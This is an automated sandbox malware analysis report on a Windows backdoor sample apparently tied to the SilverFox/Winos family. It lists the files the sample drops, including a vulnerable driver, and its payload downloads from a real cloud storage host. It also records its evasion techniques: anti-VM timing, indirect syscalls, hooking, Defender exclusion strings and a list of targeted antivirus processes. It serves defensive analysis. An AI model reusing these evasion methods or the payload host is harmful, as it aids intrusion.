Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2976587-987347589.08.exe

Overview

General Information

Sample name:2976587-987347589.08.exe
Analysis ID:1588718
MD5:3f0d4ac83e0bec29aebc666ff027a5d6
SHA1:0e8432e8855e31eca680181b961852deaba74ee8
SHA256:857bcee55a11cc0dd14006a38bd0ca0a8d7f88ea6018219b55ff797cddccea95
Tags:backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sample is not signed and drops a device driver
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Yara signature match

Classification

  • System is w10x64
  • 2976587-987347589.08.exe (PID: 6496 cmdline: "C:\Users\user\Desktop\2976587-987347589.08.exe" MD5: 3F0D4AC83E0BEC29AEBC666FF027A5D6)
  • ZDIg31.exe (PID: 1992 cmdline: C:\Users\user\Documents\ZDIg31.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
6.2.ZDIg31.exe.27a0000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 2976587-987347589.08.exeVirustotal: Detection: 16%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: unknownHTTPS traffic detected: 39.103.20.105:443 -> 192.168.2.12:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.105:443 -> 192.168.2.12:49722 version: TLS 1.2
Source: Binary string: BootstrapPackagedGame-Win64-Shipping.pdb source: 2976587-987347589.08.exe
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: ZDIg31.exe, 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmp, ZDIg31.exe, 00000006.00000000.3362569064.0000000140014000.00000002.00000001.01000000.00000008.sdmp, ZDIg31.exe.0.dr
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_00007FFE9B90A1B8 FindFirstFileExW,6_2_00007FFE9B90A1B8
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DFFE
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DDFF
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]6_2_0000000140011270
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DE96
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DEFB
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000E178
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DDD9
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: GetDataHost: 662hfg.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: 662hfg.oss-cn-beijing.aliyuncs.com
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 189atohci.sys.0.dr, ZDIg31.exe.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0I
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0P
Source: 189atohci.sys.0.dr, ZDIg31.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
Source: ZDIg31.exe.0.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: ZDIg31.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: ZDIg31.exe.0.drString found in binary or memory: http://s.symcd.com06
Source: ZDIg31.exe.0.drString found in binary or memory: http://s.symcd.com0_
Source: ZDIg31.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: ZDIg31.exe.0.drString found in binary or memory: http://s2.symcb.com0
Source: ZDIg31.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: ZDIg31.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
Source: ZDIg31.exe.0.drString found in binary or memory: http://sv.symcd.com0&
Source: ZDIg31.exe.0.drString found in binary or memory: http://sw.symcb.com/sw.crl0
Source: ZDIg31.exe.0.drString found in binary or memory: http://sw.symcd.com0
Source: ZDIg31.exe.0.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: ZDIg31.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: 189atohci.sys.0.dr, ZDIg31.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: ZDIg31.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: 189atohci.sys.0.dr, ZDIg31.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 189atohci.sys.0.dr, ZDIg31.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: ZDIg31.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 189atohci.sys.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: ZDIg31.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
Source: ZDIg31.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
Source: ZDIg31.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
Source: ZDIg31.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
Source: ZDIg31.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0)
Source: ZDIg31.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
Source: 189atohci.sys.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownHTTPS traffic detected: 39.103.20.105:443 -> 192.168.2.12:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.105:443 -> 192.168.2.12:49722 version: TLS 1.2

System Summary

barindex
Source: 6.2.ZDIg31.exe.27a0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_0000000140006C95 NtAllocateVirtualMemory,6_2_0000000140006C95
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,6_2_0000000140001520
Source: C:\Users\user\Desktop\2976587-987347589.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_000000014000C3F06_2_000000014000C3F0
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_000000014000CC006_2_000000014000CC00
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_0000000140001A306_2_0000000140001A30
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_000000014000C2A06_2_000000014000C2A0
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_00000001400022C06_2_00000001400022C0
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_00000001400110F06_2_00000001400110F0
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_0000000140010CF06_2_0000000140010CF0
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_00000001400093006_2_0000000140009300
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_000000014000BB706_2_000000014000BB70
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_0000000140003F806_2_0000000140003F80
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_00000001400103D06_2_00000001400103D0
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_00007FFE9B9102486_2_00007FFE9B910248
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_00007FFE9B90A1B86_2_00007FFE9B90A1B8
Source: Joe Sandbox ViewDropped File: C:\Users\user\Documents\ZDIg31.exe D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
Source: 6.2.ZDIg31.exe.27a0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 189atohci.sys.0.drBinary string: \Device\Driver\
Source: 189atohci.sys.0.drBinary string: \Device\TrueSight
Source: classification engineClassification label: mal80.evad.winEXE@2/12@1/1
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,6_2_0000000140003F80
Source: C:\Users\user\Documents\ZDIg31.exeCode function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,6_2_0000000140001430
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,6_2_0000000140001520
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,6_2_0000000140001520
Source: C:\Users\user\Desktop\2976587-987347589.08.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\i[1].datJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeMutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: 2976587-987347589.08.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\2976587-987347589.08.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 2976587-987347589.08.exeVirustotal: Detection: 16%
Source: C:\Users\user\Desktop\2976587-987347589.08.exeFile read: C:\Users\user\Desktop\2976587-987347589.08.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\2976587-987347589.08.exe "C:\Users\user\Desktop\2976587-987347589.08.exe"
Source: unknownProcess created: C:\Users\user\Documents\ZDIg31.exe C:\Users\user\Documents\ZDIg31.exe
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: pid.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: hid.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Users\user\Documents\ZDIg31.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Documents\ZDIg31.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\ZDIg31.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: 2976587-987347589.08.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 2976587-987347589.08.exeStatic file information: File size 30887936 > 1048576
Source: 2976587-987347589.08.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1d58200
Source: 2976587-987347589.08.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 2976587-987347589.08.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 2976587-987347589.08.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 2976587-987347589.08.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 2976587-987347589.08.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 2976587-987347589.08.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 2976587-987347589.08.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: BootstrapPackagedGame-Win64-Shipping.pdb source: 2976587-987347589.08.exe
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: ZDIg31.exe, 00000006.00000002.3371016413.0000000140014000.00000002.00000001.01000000.00000008.sdmp, ZDIg31.exe, 00000006.00000000.3362569064.0000000140014000.00000002.00000001.01000000.00000008.sdmp, ZDIg31.exe.0.dr
Source: 2976587-987347589.08.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 2976587-987347589.08.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 2976587-987347589.08.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 2976587-987347589.08.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 2976587-987347589.08.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_000000014000F000

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\2976587-987347589.08.exeFile created: C:\Users\user\Documents\ZDIg31.exeJump to dropped file
Source: C:\Users\user\Desktop\2976587-987347589.08.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\2976587-987347589.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Desktop\2976587-987347589.08.exeFile created: C:\Users\user\Documents\ZDIg31.exeJump to dropped file
Source: C:\Users\user\Desktop\2976587-987347589.08.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\2976587-987347589.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,6_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Users\user\Documents\ZDIg31.exeMemory written: PID: 1992 base: 7FFEA3F90008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\ZDIg31.exeMemory written: PID: 1992 base: 7FFEA3E2D9F0 value: E9 20 26 16 00 Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\2976587-987347589.08.exeRDTSC instruction interceptor: First address: 1400010D3 second address: 1400010EA instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2976587-987347589.08.exeRDTSC instruction interceptor: First address: 1400010EA second address: 1400010EA instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007F1D38D548E0h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2976587-987347589.08.exeWindow / User API: threadDelayed 585Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeWindow / User API: threadDelayed 414Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeDropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Documents\ZDIg31.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_6-14031
Source: C:\Users\user\Documents\ZDIg31.exeAPI coverage: 2.7 %
Source: C:\Users\user\Desktop\2976587-987347589.08.exe TID: 6520Thread sleep count: 585 > 30Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe TID: 6520Thread sleep time: -292500s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe TID: 6520Thread sleep count: 414 > 30Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exe TID: 6520Thread sleep time: -207000s >= -30000sJump to behavior
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_00007FFE9B90A1B8 FindFirstFileExW,6_2_00007FFE9B90A1B8
Source: C:\Users\user\Documents\ZDIg31.exeAPI call chain: ExitProcess graph end nodegraph_6-14032
Source: C:\Users\user\Documents\ZDIg31.exeAPI call chain: ExitProcess graph end nodegraph_6-14376
Source: C:\Users\user\Desktop\2976587-987347589.08.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_00000001400073E0 LdrLoadDll,6_2_00000001400073E0
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0000000140007C91
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_000000014000F000
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,6_2_0000000140004630
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0000000140007C91
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000001400106B0
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_00000001400092E0 SetUnhandledExceptionFilter,6_2_00000001400092E0
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_00007FFE9B901F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FFE9B901F50
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_00007FFE9B9076E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FFE9B9076E0
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_00007FFE9B902630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FFE9B902630

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Documents\ZDIg31.exeNtAllocateVirtualMemory: Indirect: 0x140006FD0Jump to behavior
Source: C:\Users\user\Documents\ZDIg31.exeNtProtectVirtualMemory: Indirect: 0x29EB253Jump to behavior
Source: C:\Users\user\Desktop\2976587-987347589.08.exeNtDelayExecution: Indirect: 0x1B94DAJump to behavior
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_00007FFE9B90FD40 cpuid 6_2_00007FFE9B90FD40
Source: C:\Users\user\Documents\ZDIg31.exeCode function: GetLocaleInfoA,6_2_000000014000F370
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_000000014000A370
Source: C:\Users\user\Documents\ZDIg31.exeCode function: 6_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,6_2_0000000140005A70
Source: ZDIg31.exe, 00000006.00000002.3370260196.00000000027B8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
Source: ZDIg31.exe, 00000006.00000002.3370260196.00000000027B8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: vsserv.exe
Source: ZDIg31.exe, 00000006.00000002.3370260196.00000000027B8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avcenter.exe
Source: ZDIg31.exe, 00000006.00000002.3370260196.00000000027B8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
